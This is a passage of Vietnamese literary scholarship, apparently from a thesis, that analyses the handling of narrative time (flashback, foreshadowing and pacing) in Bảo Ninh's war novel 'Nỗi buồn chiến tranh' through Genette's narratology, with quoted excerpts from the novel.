Trong công trình khoa học “Thời gian trong “Đi tìm thời gian đã mất” của M.Proust”, Tiến sĩ Đào Duy Hiệp đã khẳng định: “Thời gian của việc kể chuyện có thể chậm hơn thời gian hư cấu khi nhà tiểu thuyết sử dụng thủ pháp nghệ thuật ngoái lại và đón trước” [19,86]. Cả hai thủ pháp nghệ thuật này thực chất đều hướng tới mục đích “căng mở” thời gian nghệ thuật, đặt quá khứ – hiện tại – tương lai vào một dòng chảy liên tục. Mặt khác, nó còn tạo nên tính hấp dẫn, lôi cuốn, góp phần biểu hiện tư tưởng chủ đề cho tác phẩm.

Nỗi buồn chiến tranh là tiểu thuyết tiêu biểu cho sự đảo lộn trật tự thời gian tuyến tính, chỉ tuân thủ theo thời gian tâm trạng. Lối đảo thuật, dự thuật liên tục được sử dụng trong tác phẩm.

* Lối đảo thuật

         Một trong những hình thức trần thuật phi tuyến tính trong Nỗi buồn chiến tranh là từ hiện tại quay ngược về quá khứ để kể chuyện. Đây là hình thức đảo thuật (quay ngược, ngoái lại) kể lại những biến cố, sự kiện đã diễn ra từ trước (những sự kiện thuộc về quá khứ nếu tính thời điểm đang kể là thời hiện tại).

Trong tác phẩm, lối đảo thuật được đánh dấu bằng những từ ngữ chỉ thời gian thuộc về quá khứ như: “chiều hôm ấy”, “mùa xuân năm ấy”, “cái đêm xa xăm ấy”, “buổi chiều tháng tư ấy”, “mùa mưa năm ngoái”, “buổi tối hôm đó”, “kí ức về một ngày mưa lũ”… Sau mỗi mốc thời gian này là dòng chảy tuôn trào những kỉ niệm, người đọc vừa dứt khỏi vùng kí ức này thì vùng kí ức khác lập tức xuất hiện. Những kỉ niệm về chiến tranh và tình yêu cứ chập trùng hiện về trong kí ức của Kiên.

Trong Nỗi buồn chiến tranh, tất cả các sự kiện, biến cố đều nằm trong dòng hồi tưởng của nhân vật. Qua sự lắp ghép, phân mảnh, hiện thực và quá khứ đan xen, không theo một nguyên tắc nhất định nào. Thời gian bị đảo lộn, đứt gãy liên tục, tạo nên dòng chảy miên man bất định trong ý thức của nhân vật Kiên. Chúng ta có thể nhận thấy đặc điểm này được thể hiện ngay trong phần mở đầu của tác phẩm. Chúng tôi tạm chia phần này thành các blog sự kiện sau:

Blog 1: Hành trình đi tìm đồng đội của Kiên

Blog 2: Kí ức về B3 tiểu đoàn 27 bị bao vây và tiêu diệt

Blog 3: Cuộc sống của người lính trinh sát (bài bạc và hồng ma)

Blog 4: Những hồn ma ở đèo Thăng Thiên

Blog 5: Can đào ngũ

Blog 6: Xung quanh vụ thám báo và ba cô gái bị bỏ quên

Chúng ta thấy, mỗi blog gắn với một sự kiện khác nhau. Mốc thời gian của các blog cách xa nhau và bị xáo trộn hoàn toàn. Nếu blog 1, sự kiện diễn ra vào mùa khô đầu tiên sau chiến tranh – 1976, thì blog 2 lùi về năm 1969, tiếp đó là blog 3 lại đẩy về năm 1974… Nghĩa là, các blog được sắp xếp một cách ngẫu hứng lộn xộn, xuôi ngược, ngược xuôi. Nhưng chúng có một lôgic nội tại đó là tâm trạng thông qua giấc mơ của nhân vật Kiên.

         Trong Nỗi buồn chiến tranh, tình yêu và chiến tranh – hai chủ đề, hai nỗi buồn thấm vào nhau liên tục xuất hiện trong dòng hồi ức của Kiên. Bởi chính “Kí ức chiến tranh và kí ức tình yêu kết thành sinh lực và thành thi hứng, giúp anh thoát khỏi cái tầm thường bi đát của số phận anh sau chiến tranh” . Lần theo dòng hồi ức của nhân vật Kiên, chúng tôi thống kê  được các blog sự kiện chính kể về nhân vật Phương trong tác phẩm như sau:

Blog 1: Kí ức về Phương tuổi 17

Blog 2: Phương bỏ đi

Blog 3: Gặp Phương đầu tiên sau chiến tranh

Blog 4: Đoàn tàu bị bom ở ga Thanh Hoá

Blog 5: Tình cảm đặc biệt của cha Kiên với Phương

Blog 6: Chuyện tình của Kiên và Phương bên Hồ Tây

Blog 7: Những ám ảnh về Phương theo Kiên trong những ngày bị thương

Blog 8: Cuộc chia tay vĩnh viễn với Phương

Blog 9: Kỷ niệm với Phương tuổi 13

Blog 10: Ngày Kiên lên đường, gặp lại Phương trước lúc lên tàu vào B

Blog 11: Kỷ niệm về Phương ở Đồ Sơn

Blog 12: Phương và Kiên trên chuyến tàu Hà Nội – Vinh

Blog 13: Tàu vào nhà ga Thanh Hoá

Blog 14: Bất hạnh đến với Phương trên chuyến tàu đi B

Trong dòng hồi tưởng miên man bất định của Kiên thì kí ức về Phương xuất hiện hầu hết, bao trùm lên toàn bộ tác phẩm. Sự vận động thời gian tự sự thông qua nhân vật Phương được người đọc cố gắng sắp xếp lại, liên tưởng để tạo nên mạch vận động của câu chuyện. Vận dụng mô hình xử lý thời gian của Genette, chúng tôi đưa chúng về thời gian lịch sử (thời gian chuyện) theo thứ tự như sau:

Blog 9  →  Blog 11   →  Blog 5   →   Blog 1 →   Blog 6   →  Blog 10 →   Blog 12  →  Blog 13   →  Blog 4   →  Blog 14   →   Blog 7   →  Blog  3 →    Blog 8   →   Blog  2.

Nhìn vào diễn biến sự kiện theo sơ đồ trên, chúng ta thấy có sự đảo lộn trong trình tự của chúng.  Chúng đã được tác giả sắp xếp lại một cách “lộn xộn”. Nhưng chính chúng lại là xương sống để tạo nên một mạch vận động độc lập của cốt truyện. Bởi vì, khi chúng ta sắp xếp chúng lại theo thời gian lịch sử thì chúng có sự vận động theo trật tự thời gian tuyến tính trước sau: từ khi Phương 13 tuổi (Blog 9) đến khi Phương bỏ ra đi vĩnh viễn (Blog 2).

Nếu mạch trần thuật sự kiện được đẩy lùi về quá khứ thì mạch biểu hiện cảm xúc cứ trôi dạt, lan tỏa từ quá khứ đến hôm nay. Dường như những chuyện của quá khứ không hề khép lại mà tiếp tục sống cùng với nhân vật Kiên trong dòng trôi của hiện tại.

* Lối dự thuật

Từ hiện tại kể trước những chuyện ở tương lai – dự thuật (đón trước, dẫn tới) cũng là hình thức kể chuyện thường gặp trong Nỗi buồn chiến tranh, nghĩa là kể trước, rào đón trước một biến cố, một nhân vật hoặc sự kiện sẽ xảy đến; nó báo hiệu, “tiền định” những điều sẽ xảy ra sau này của câu chuyện. Theo Trần Đình Sử “kể những chuyện sẽ xảy ra còn được gọi là dự tự” [56,82].

Tsêkhốp khi nói về nghệ thuật viết văn đã cho rằng: “Mở đầu câu chuyện nếu tác giả miêu tả khẩu súng treo ở trên tường thì kết thúc câu chuyện đó, khẩu súng ấy phải bắn”. Chẳng hạn, Kiều gặp Đạm Tiên báo mộng – Truyện Kiều (Nguyễn Du); Julien Sorrel thấy chậu nước màu đỏ như máu bởi tấm thảm nhung phản chiếu, sau này Julien Sorrel bị rơi đầu và máu đỏ như màu tấm thảm – Đỏ và đen (Stendhal); Anna Karenina gặp người yêu trên sân ga, sau này kết thúc số phận của mình trên đường ray – Anna Karenina (L.Tolstoi)…

Khảo sát tiểu thuyết Nỗi buồn chiến tranh, chúng ta cũng thấy một “tương lai” như thế thông qua hình thức dự thuật. Trong tác phẩm, người đọc liên tục bắt gặp những đoạn văn có tính chất báo trước cho những sự kiện, biến cố sẽ xảy ra:

Về sau, rất nhiều năm về sau này, khi đã là một người cầm bút đứng tuổi, đã dấn thân khá sâu vào văn nghiệp, viết đã nhiều truyện ngắn, truyện vừa về chiến tranh, đã lục lọi, đảo xới hầu như toàn bộ cuộc đời lính của mình lên để nạp vào trang bản thảo”.

        – “Về sau, mỗi khi được nghe người ta kể hoặc được xem phim, được thấy cảnh ngày 30 tháng 4 ở Sài Gòn trên màn ảnh (…) tự nhiên trong Kiên cứ nhói lên nỗi buồn pha cả niềm ghen tỵ” .

       – “Về sau trong những đêm ngày liên miên của chiến tranh, Kiên vẫn thường thấy lại ở mình và ở những người xung quanh những giờ phút dài dằng dặc chìm chết trong trạng thái mất hồn này” .

        – “Phải một thời gian sau, nhờ tham gia vào đội thu nhặt hài cốt tử sĩ của sư đoàn, Kiên mới có dịp trở lại vùng hồ Cá Sấu”

Những từ ngữ chỉ thời tương lai như: “về sau”, “nhiều năm về sau này”, “một thời gian sau” được chêm xen một cách khá thú vị trong mạch trần thuật, khiến truyện trở nên linh hoạt, có tác dụng “đón trước” cho những sự kiện, biến cố sẽ xảy ra sau này.

Sự kiện cha Kiên – “một họa sỹ lạc thời” đốt toàn bộ những bức tranh mà mình đã sáng tạo trước lúc ông từ giã cõi đời với nghi lễ “cuồng tín, man rợ, dấy loạn”, đã được người kể chuyện kể trước theo hình thức dự thuật (trước khi độc giả được nghe kể về người cha và tuổi ấu thơ của Kiên, trước khi Phương chính thức kể cho Kiên về sự kiện này). Hành vi đốt tranh của người nghệ sĩ thể hiện tột cùng của sự “lạc loài” của một tâm hồn trong thời đại mới, đồng thời nó như là một dự cảm, một tiên nghiệm về tương lai: Chiến tranh sẽ hủy diệt cái đẹp, cái đẹp không thể tồn tại cùng chiến tranh. Tình cảm của cha Kiên đối với Phương cũng nằm trong ý nghĩa đó. Đó là sự chiêm ngưỡng cái đẹp của một họa sĩ và sự lo âu trước tương lai của cái đẹp khi chiến tranh đến: “Ngọn lửa thiêu các bức tranh, thiêu đốt cha và luôn cả đời em. Qua ánh lửa ấy em nhìn thấy tương lai” .

Về sau, đi qua chiến tranh với những kỷ niệm đau xót, Kiên cũng trải qua những vật vã trong sáng tác và đau đớn trong cuộc đời hiện tại như cha mình. Anh cũng thiêu hủy bản thảo của mình như cha anh đốt tranh ngày xưa. Những chuyện xung quanh quá trình vật vã để viết lách của Kiên cũng được người kể chuyện kể theo lối dự thuật. Các sự kiện như: Kiên đốt hết những trang bản thảo “các tàn giấy xào xạc tơi vụn ra và bay từ miệng lò vào khắp căn phòng tối đen lạnh lẽo”, chiếm đoạt người đàn bà câm “một cách cuồng bạo, khốc liệt, giằng xé, thẳng thừng tàn phá, đâm vào chị nỗi đơn độc bí ẩn, sắc như dao, đầy hiểm nghèo của anh…” được người kể chuyện kể trước, kèm theo lời chú thích: “Tuy nhiên, tất cả những chuyện trên đều sẽ chỉ xảy ra về sau, vào một mùa đông xa vời phía trước. Còn lúc này vẫn đang trong thời quá khứ. Còn Kiên, theo như cách anh tự biểu tượng, vẫn đang hằng đêm hóa thân thành ngọn nến leo lét cháy lên trong bầu không khí tù đọng, trong cảm giác ngột ngạt và trong những buồn đau say khướt không tài nào ai hiểu nổi của anh” . Quá trình sáng tạo đầy cam khổ, nghiệt ngã như vắt kiệt sinh mệnh nhưng không phải không có lúc tưởng như vô nghĩa lí của Kiên được nhấn mạnh hơn nhờ được kể theo lối dự thuật này.

Trong tiểu thuyết của Bảo Ninh “hình tượng người cha nghệ sĩ của Kiên có giá trị như một thứ Đạm Tiên báo trước cuộc đời anh” [60,90]. Đi qua chiến tranh với những kỷ niệm “có thể là êm đềm, có thể là ác hại”, Kiên trở thành người bị cầm tù của quá khứ với một thứ “thiên mệnh” thiêng liêng. Anh cũng phải trải qua những vật vã trong sáng tác và những đau đớn trong cuộc đời hiện tại như cha mình. Và hành động cuối cùng trong cuộc đời nghệ sĩ của anh cũng là một nghi lễ tiêu huỷ toàn bộ sản phẩm tinh thần của cuộc đời mình. Kiên chính là “nỗi buồn truyền kiếp” của cha, một người đã xả thân làm người hùng, tiêu phí cuộc đời trong nghĩa vụ, trong tàn sát, trong chiến thắng, sống sót trở về, để rồi không bao giờ có thể thoát khỏi nỗi cô đơn lạc loài, yếu đuối đã từng bóp nghẹt cuộc đời cha Kiên.

Ngoài ra, lối kể dự thuật cũng được người kể chuyện thể hiện qua những đoạn linh cảm, dự cảm về tương lai, về số phận bất trắc của nhân vật. Cha Kiên đã có một cái nhìn dự cảm mang tính tiền định về Phương khi cô bé 16 tuổi: “Sắc đẹp của cháu không bình thường (…) Vẻ đẹp lạc thời và lạc loài sẽ đau khổ đấy. Khổ lắm.” [45,163]. Ngay bản thân Phương cũng đã có một dự cảm về tương lai của mình. Trong một buổi đi dạo bên Hồ Tây với Kiên, Phương nói: “Em nhìn thấy tương lai – đấy là sự đổ nát, sự thiêu hủy”. Người con gái ấy lạc loài, lạc thời ngay ở sắc đẹp bừng cháy rực rỡ của cô. Giữa bom đạn chiến tranh, cái đẹp ấy phải nép mình đi hoặc phải thay đổi, ngụy trang nhưng Phương lại tỏa sáng, đẹp một cách “kì ảo”, “khôn lường”. Vậy nên vẻ đẹp đó trở thành tâm điểm cho mọi sự tàn phá. Tâm hồn trong sạch, hoàn mĩ tuyệt đối của cô không phù hợp với cái hỗn loạn của chiến tranh và của cả cái xô bồ thời hậu chiến. Ra khỏi chiến tranh, Phương trở thành người đàn bà trác táng, thác loạn trong nỗi cô đơn khốn cùng. Nàng đã sống một cuộc đời tăm tối, nhàu nhĩ trong những “lạc thú nhơ nhớp, tả tơi, như rẻ rách và nghèo nàn không khác gì bát cơm manh áo”. Nỗi cô đơn của Phương chính là nỗi cô đơn của cái đẹp lạc thời và lạc loài.

Có thể nói, lối kể dự thuật được tác giả sử dụng như một thủ pháp nghệ thuật quan trọng, có ý nghĩa thông báo trước một sự kiện tất yếu sẽ xảy đến, làm câu chuyện ngày càng tiến đến độ sáng tỏ.

        Nếu đảo thuật “biện pháp nghệ thuật có khả năng cô đọng, dồn nén khiến thời gian như chậm lại thông qua sự hồi cố, hồi tưởng của nhân vật” [7,90], thì lối dự thuật là thủ pháp nghệ thuật có khả năng giúp nhà văn phác thảo những chi tiết, sự việc trong tương lai, “kéo giãn” thời gian khiến người đọc có cảm giác sự kiện diễn tiến nhanh hơn. Thời gian trong Nỗi buồn chiến tranh là thời gian từ hiện tại đẩy lùi về quá khứ và tiến tới tương lai nhưng “cái tương lai mà tác phẩm hướng tới lại vẫn là quá khứ của thì hiện tại. Quá khứ  – hiện tại – tương lai đồng hiện nhưng bánh xe thời gian vẫn quay lùi về quá khứ” [9,34].

Tốc độ

Tốc độ (speed) chỉ ra “mối liên hệ giữa khoảng thời gian có thể thay đổi các phần của câu chuyện với độ dài của chính văn bản mà trong đó các phần truyện được kể lại” [53,67]. Vì vậy, nói đến tốc độ trần thuật là nói đến cách kể của người kể chuyện: kể nhanh hay chậm, kể tỉ mỉ về từng sự kiện, chi tiết hay chỉ lựa chọn những sự việc quan trọng và lược thuật về nó. Về tốc độ trần thuật, Genette phân biệt 4 dạng thức cơ bản mà ông gọi là bốn vận động tự sự, bao gồm: lược thuật (summary), tỉnh lược (ellipsis), ngừng nghỉ (pause), hoạt cảnh (scene).

So với thời gian câu chuyện thì thời gian tự sự có khi gia tốc, có khi giảm tốc. Nghĩa là, nếu thời gian câu chuyện bị dồn nén lại trong thời gian tự sự thì tốc độ trần thuật sẽ nhanh, gấp hay còn gọi là trần thuật gia tốc. Ngược lại, thời gian câu chuyện được kéo giãn ra trong thời gian tự sự thì tốc độ trần thuật chậm lại hay còn gọi là trần thuật giảm tốc. “Sự luân phiên giữa trần thuật gia tốc và trần thuật giảm tốc sẽ tạo ra nhịp điệu tự sự” [22,19]. Tác giả Lê Lưu Oanh khẳng định: “Nhịp điệu được thể hiện trước hết ở tốc độ trần thuật” [46,147]. Tốc độ trần thuật là điểm nhấn cơ bản định vị nhịp điệu trần thuật. Tùy thuộc sự nhanh, chậm của tốc độ trần thuật mà nhịp điệu trần thuật được hình thành.

Thời gian tự sự là thời gian của người kể, tốc độ và nhịp kể có thể nhanh hay chậm tùy thuộc theo chủ ý của tác giả. Nếu tốc độ trần thuật trong một số tiểu thuyết Việt Nam thời đổi mới: Paris 11 tháng 8, Chinatown – Thuận, Thoạt kì thủy – Nguyễn Bình Phương… được diễn ra với tốc độ khá nhanh (Chinatown – Thuận: chỉ trong hai tiếng đồng hồ, người phụ nữ xưng “tôi” đã tóm lược cả đoạn đời 39 tuổi của mình) thì trong Nỗi buồn chiến tranh, tốc độ trần thuật lại có xu hướng chậm hơn.

Nỗi buồn chiến tranh là hồi ức về chiến tranh của nhân vật chính – Kiên. Thời gian cốt truyện của tác phẩm khoảng trên dưới 25 năm (từ năm 1965 – đầu những năm 90 của thế kỉ XX) tương ứng với thời gian văn bản là 312 trang. Như vậy, con số trung bình là 312 : 25 = 12,48 trang/ năm. Nhìn vào con số này, ta thấy “số đo tốc độ gốc” (tachometric measurement) của toàn truyện [72,34] – tức là tốc độ kể trung bình của truyện kể khá chậm. Chính từ tốc độ truyện kể này đã tạo cho nhịp kể của truyện một tính chất hồi cố, trăn trở. Tác giả Bùi Việt Thắng chỉ ra nhịp điệu của Nỗi buồn chiến tranh trong một phép so sánh: “Nhịp điệu của Thân phận của tình yêu là nhịp điệu của một con tàu lầm lũi trong đêm trường, trên đó có một con người đi tìm thời gian đã mất” [62].

Tuy nhiên, thời gian của việc kể chuyện trong mỗi trường đoạn cụ thể lại có những nhịp điệu tốc độ khác nhau do những thủ pháp thời gian khác nhau quy định. Cách sử dụng các dạng thức “vận động tự sự” phù hợp đã tạo nên đặc trưng tốc độ trần thuật trong Nỗi buồn chiến tranh.

 Sử dụng cảnh, giãn chậm thời gian câu chuyện

Cảnh (scene) là “những thời điểm của hành động mang tính kịch được miêu tả theo một cách thức gây ấn tượng sâu sắc” [53,69], chủ yếu là các lời thoại (đối thoại hoặc độc thoại). Thời gian tự sự tại những hoạt cảnh này thường lắng đọng để cho nhân vật bộc lộ tính cách, tư tưởng.

Trong Nỗi buồn chiến tranh, chúng tôi đặc biệt quan tâm tới những nhận thức bên trong được thể hiện qua dòng độc thoại nội tâm của nhân vật. Lúc đó “thời gian câu chuyện dường như ngừng vận động, nhưng sự kiện thì được khắc ghi sâu hơn trong lòng nhân vật” [3,96]. Nỗi buồn chiến tranh là tiểu thuyết có những dòng độc thoại nội ám ảnh và sâu lắng. Nhân vật chính trong tác phẩm – Kiên, một con người bước ra từ cuộc chiến, mọi sự kiện về chiến tranh, tình yêu… đều tác động đến thế giới tinh thần anh, tạo nên một khoảng không cho nhân vật “nếm trải”, suy ngẫm.

Kiên là người đã đi qua cuộc chiến tranh ác liệt của dân tộc. Kiên nhận thấy đằng sau cuộc chiến tranh đầy vinh quang ấy, Kiên là người mất hết tuổi trẻ, tình yêu, đồng đội, người thân, bạn bè… Anh chẳng còn giữ lại gì cho riêng mình sau ngày chiến thắng, ngoài những giấc mộng, những ám ảnh về quá khứ đau đớn. Cuộc đời anh giờ đây tẻ nhạt, lạnh ngắt và chua xót khi anh tự thốt lên: “Thì ra cuộc đời tôi kì thực có khác nào con thuyền bơi ngược dòng sông không ngừng đẩy lùi về dĩ vãng. Đối với tôi, tương lai đã nằm lại ở phía sau xa kia rồi. Và không phải là cuộc sống mới, thời đại mới, không phải là những hi vọng về tương lai tốt đẹp đã cứu giúp tôi, mà trái lại những tấn thảm kịch của quá khứ đã nâng đỡ tâm hồn tôi, tạo sức mạnh tinh thần cho tôi thoát khỏi vô tận những tấn trò đời hôm nay…”. Độc thoại phơi bày những suy nghĩ bên trong của nhân vật, vì thế thời gian dường như lắng lại, ngừng trôi chảy, góp phần làm giãn mạch truyện, làm chậm lại tốc độ kể chuyện.

Các hoạt cảnh độc thoại, mà tiêu biểu là độc thoại nội tâm đã góp phần đắc lực trong việc đi sâu khám phá tâm hồn con người, diễn tả những nỗi niềm u uẩn, day dứt, trăn trở, những điều sâu lắng thầm kín trong tâm hồn Kiên. Và “Những phút lặng hồi tưởng, bắt đầu cho cuộc hành trình tìm về quá khứ của nhân vật đã làm chậm tốc độ kể chuyện” [47]:

“Bây giờ đây chỉ có nỗi buồn, mênh mang nỗi buồn – nỗi buồn được sống sót, nỗi buồn chiến tranh – tràn phủ tâm hồn anh.

         Nếu không nhờ có Hòa cùng biết bao đồng đội thân yêu ruột thịt, vô số và vô danh, những người lính thường, những liệt sĩ của lòng nhân đã làm sáng danh đất nước này và đã làm nên vẻ đẹp tinh thần cho cuộc kháng chiến, thì đối với Kiên, chiến tranh với bộ mặt gớm guốc của nó, với những móng vuốt của nó, với những sự thật trần trụi bất nhân nhất của nó sẽ chỉ đơn thuần có nghĩa là một thời buổi và một quãng đời mà bất kì ai đã phải trải qua, đều mãi bị ám ảnh, mãi mãi mất khả năng sống bình thường, mãi mãi không thể tự tha thứ cho mình. Bản thân anh nếu không nhờ được sự che chở đùm bọc, được cưu mang và được cứu rỗi trong tình đồng đội bác ái thì ắt rằng đã chết từ lâu, không vì bị giết chết cũng sẽ tự giết mình bằng cách nào đó để thoát khỏi gánh nặng chém giết, gánh nặng bạo lực mà thân phận con sâu cái kiến của ngưởi lính phải cõng trên lưng đời đời kiếp kiếp.

         Bây giờ thì đã qua cả rồi. Tiếng ồn ào của những cuộc xung sát đã im bặt. Gió lặng cây dừng. Và vì chúng ta đã chiến thắng nên đương nhiên có nghĩa là chính nghĩa đã thắng, điều này có một ý nghĩa an ủi lớn lao, thật thế. Tuy nhiên, cứ nghĩ mà xem, cứ nhìn vào sự sống sót của bản thân mình, cứ nhìn kĩ vào nền hòa bình thản nhiên kia và nhìn cái đất nước đã chiến thắng này mà xem: đau xót, chua chát và nhất là buồn xiết bao.

         Chính nghĩa đã thắng, lòng nhân đã thắng, nhưng cái ác, sự chết chóc và bạo lực phi nhân cũng đã thắng. Cứ nhìn mà xem, cứ ngẫm nghĩ mà xem, sự thực là như thế đấy. Những tổn thất, những mất mát có thể bù đắp, các vết thương sẽ lành, đau khổ sẽ hóa thạch, nhưng nỗi buồn về cuộc chiến tranh thì sẽ càng ngày càng thấm thía hơn, sẽ không bao giờ nguôi.

Chính là từ chuyến đi tảo mộ năm ấy, trên con đường hành hương xuyên giữa rừng rậm chằng chịt những sự tích bị lãng quên, qua hồ Cá Sấu với Hòa, qua truông Gọi Hồn với anh em trong đội trinh sát mà Kiên đã bắt đầu quá trình lâu dài cảm nhận lại chiến tranh dưới làn ánh sáng chậm rãi của nỗi buồn” .

Đây là một đoạn khá dài nhưng sự kiện, tình tiết thì không phát triển thêm mà vẫn chỉ dừng lại ở việc “Kiên ngồi xuống ở một bìa rừng trong bóng hoàng hôn, nhắm mắt lại dõi nhìn vào cõi xa khuất” và cả đoạn chỉ là những cảm nhận của Kiên về chiến tranh. Chúng gợi ra ấn tượng về sự ngưng đọng của thời gian bởi không có sự tiến triển của các biến cố, sự kiện. Thời gian kể chuyện vẫn diễn ra, trong khi thời gian của truyện thì trở nên đóng băng. Điều đó khiến thời gian truyện chậm hơn so với thời gian kể chuyện. Việc giãn chậm dường như là một sự gián cách, làm giảm đi tốc độ kể chuyện.

 Sự tham gia của quãng ngưng

         Trong Nỗi buồn chiến tranh, nhà văn cũng có thể làm mạch truyện chậm lại bằng cách xen vào những đoạn miêu tả (thiên nhiên, chân dung nhân vật) và những lời bình luận mang tính chất “trữ tình ngoại đề” của người kể chuyện… Những đoạn như vậy được gọi là những quãng ngưng của truyện, vì ở những đoạn đó thời gian trần thuật dừng lại, tốc độ trần thuật giảm tốc.

Sự tham gia của những quãng ngưng nhằm làm giãn chậm tốc độ trần thuật được thể hiện trước hết ở những đoạn miêu tả. Mở đầu tác phẩm là một nhịp kể bình thản, chậm rãi bắt vào việc miêu tả mùa mưa đầu sau chiến tranh với âm hưởng man mác của nỗi buồn thân phận: “Tháng chín và tháng mười, rồi tháng mười một nữa đã trôi qua, vậy mà trên dọc dòng Ya Crông Rôcô làn nước mùa mưa xanh ngát vẫn tràn ắp đôi bờ. Thời tiết bấp bênh. Ngày nắng. Đêm mưa. Mưa nhỏ thôi, nhưng mưa. Mưa… núi non nhạt nhòa, những nẻo xa mờ mịt. Cây rừng ướt át. Cảnh rừng lặng lẽ. Tối ngày đất rừng ngun ngút bốc hơi. Biển hơi màu lục, ngụt mùi lá mục” . Sự chậm rãi của nhịp kể hoà cùng sự chậm rãi, êm dịu của màn mưa khiến cho tốc độ kể chuyện dường như chậm lại trong mạch trần thuật.

Trước khi trở thành người lính, Kiên là một chàng trai Hà thành. Hà Nội trong Kiên là cuộc sống yên bình của ngôi nhà chung cư trên đường Nguyễn Du. Những kỉ niệm về Hà Nội, về phố phường, cảnh vật, trường Bưởi với những hàng cây râm mát đã gắn bó thân thiết bao nhiêu với những kỉ niệm của tuổi học trò. Đặc biệt khung cảnh Hồ Tây, đường Cổ Ngư luôn hiện về trong kí ức Kiên với: “Bầu trời cao vợi, mây nắng tuyệt vời gần như là tầng trời của những giấc chiêm bao thời thơ ấu. Và dưới vòm trời xán lạn ấy, Kiên lại được thấy Hà Nội của anh. Hồ Tây, chiều hạ, hàng phượng vĩ ven hồ, tiếng ve sầu ran lên khi hoàng hôn xuống, và anh cũng nghe thấy, cảm thấy gió hồ lộng thổi, cảm thấy sóng vỗ mạn thuyền” . Có thể nói, những đoạn tả cảnh thiên nhiên đã đem lại cho người đọc những cảm nhận thi vị. Đây phải chăng là những bến bờ bình yên, nơi thanh lọc tâm hồn con người sau những tháng ngày “dông bão” của lửa đạn. Tốc độ trần thuật chậm rãi giúp cho tâm hồn nhân vật như được trải rộng ra cùng với những cảm nhận về thiên nhiên cảnh vật tươi đẹp thời thơ ấu.

Sự tham gia của những quãng ngưng có tác dụng làm chậm lại câu chuyện, trì hoãn lại những sự kiện đang được kể. Đồng thời, trong nhiều trường hợp, những quãng ngưng (bằng cách chen vào miêu tả) giúp người kể chuyện nói rõ hơn bối cảnh, không gian truyện nhằm mục đích cung cấp thông tin cho độc giả. Ngay từ mở đầu tác phẩm, kí ức đã đưa Kiên về với trận đánh cuối mùa khô năm 1969, trận đánh mà cả tiểu đoàn 27 bị tiêu diệt, chỉ có Kiên và một vài người sống sót. Kí ức sống dậy như một đoạn phim quay cận cảnh đầy kinh hoàng: “Mùa khô ấy, nắng to gió lớn, rừng bị tưới đẫm xăng đặc, cuồn cuộn lửa luyện ngục. Các đại đội đã tan tác đang cố co cụm, lại bị đánh tan tác. Trên đầu trực thăng rà rạp các ngọn cây và gần như thúc họng đại liên vào gáy từng người một mà bắn. Máu tung xối, chảy tóe, ồng ộc, nhoe nhoét. Trên cái trảng hình thoi ở giữa truông, cái trảng mà nghe nói đến ngày nay cỏ cây vẫn chưa lại hồn để mọc lên nổi hồi đó la liệt xác người bị đốn, thân thể dập vỡ, tanh bành, phùn phụt phì hơi nóng” . Trong mạch trần thuật, người kể chuyện đã tạo một quãng ngừng nghỉ, dừng lại để miêu tả tường tận về sự về sức tàn phá, hủy diệt ghê gớm của chiến tranh, đồng thời nó cũng giúp ta thấy được bối cảnh mà người kể chuyện hướng đến không gian chiến trận.

Ngoài ra, những quãng ngưng miêu tả chân dung nhân vật cũng góp phần làm chậm lại dòng chảy của truyện kể. Trong miền kí ức chảy trôi bất định của Kiên, Phương hiện lên với một vẻ ngoài tuyệt mĩ. Vẻ đẹp tuyệt mĩ từ thân thể của nàng là công trình tuyệt diệu của tạo hóa: “Hai cánh tay đẹp đẽ, hai bờ vai tròn lẳn, hai bầu vú nây rắn rung lên nhè nhẹ; cái eo mịn màng, phẳng phiu, hơi thót vào một chút đến nỗi đám lông đen dầy mịn giữa cặp đùi tròn trĩnh trông như một miếng đệm nhung; đôi chân đẹp như tạc, dài và chắc, mềm mại với làn da sữa đặc…” . Bằng tất cả sự cảm nhận của mình và tình yêu mãnh liệt với Phương, Kiên đã tạc nên một thần Vệ nữ cho riêng lòng anh. Đúng như lời tự nhủ của Kiên, Phương là một sắc đẹp “kì ảo khôn lường, đẹp một cách đau lòng”, một sắc đẹp “bị chấn thương, như thể một sắc đẹp lâm nguy, mấp mé bên bờ vực thẳm”. Sắc đẹp “lạc thời và lạc loài” dường như báo trước về số phận của nhân vật.

Bên cạnh những quãng ngưng miêu tả (thiên nhiên, bối cảnh, chân dung nhân vật) thì trong Nỗi buồn chiến tranh, những lời bình luận mang tính chất “trữ tình ngoại đề” của người kể chuyện cũng có tác dụng kéo giãn thời gian, làm giảm tốc độ trần

thuật. Đây là những lời bình luận mang tính chủ quan của người kể chuyện khi “anh ta” nhìn thấy sự chờ đợi của người đàn bà câm với “tay nhà văn phường Kiên” như là sự chung thủy của độc giả dành cho tác phẩm: “Riêng tôi thì tôi lại cảm thấy trong sự chờ đợi kín như bưng của người đàn bà câm đối với tay nhà văn của phường có cái gì như lòng chung thủy của một độc giả dành cho tác phẩm gối đầu giường. Và nếu đúng như vậy thì giá trị của tác phẩm không bao giờ ra đời ấy, tôi nghĩ chí ít cũng đã được khẳng định, hay nói cách khác được đảm bảo bởi tấm lòng người độc giả độc nhất của nó”. Người kể chuyện còn hình dung ra bạn đọc của tương lai và trao đổi: “Cũng là một trung đội trinh sát đó thôi bạn hãy tưởng tượng mà xem, ở trang này họ là những người lính thiện chiến nhất, gây chết chóc đáng sợ nhất cho đối phương, ở trang sau hỡi ôi, không thể tin được họ lại biến thành những nhân vật u ám, ngợp ngọng nhất, yếu đuối và lờ phờ nhất, thậm chí tác giả còn biến họ thành những hồn ma, những âm binh ảo não…” . Người kể chuyện ở đây đã nhận thấy một điều sẽ xảy ra đó là dư luận về cuốn tiểu thuyết, có thể là được ca ngợi chấp nhận và cũng có khi là bị phê phán chối từ, và anh đã chấp nhận nó một cách bình thản: “Tất cả đang diễn ra đột nhiên đứt gãy và bị quét sạch khỏi giữa chừng trang giấy như rơi vào một kẽ nứt nào đó của thời gian tác phẩm. Ta vẫn gọi đó là sự mất bố cục, sự thiếu mạch lạc, thiếu bao quát nhiều khi đó là sự hụt hẫng của tư duy người viết.” .

Trong Nỗi buồn chiến tranh, phần lớn những màn cảnh đều có sự giảm tốc như vậy. Chính điều đó đã tạo nên cho tác phẩm một nhịp điệu riêng – nhịp điệu chậm rãi nhưng không tẻ nhạt đều đều mà xoáy sâu, day dứt đầy ám ảnh.

Thiên hướng sử dụng ít tỉnh lược và lược thuật             

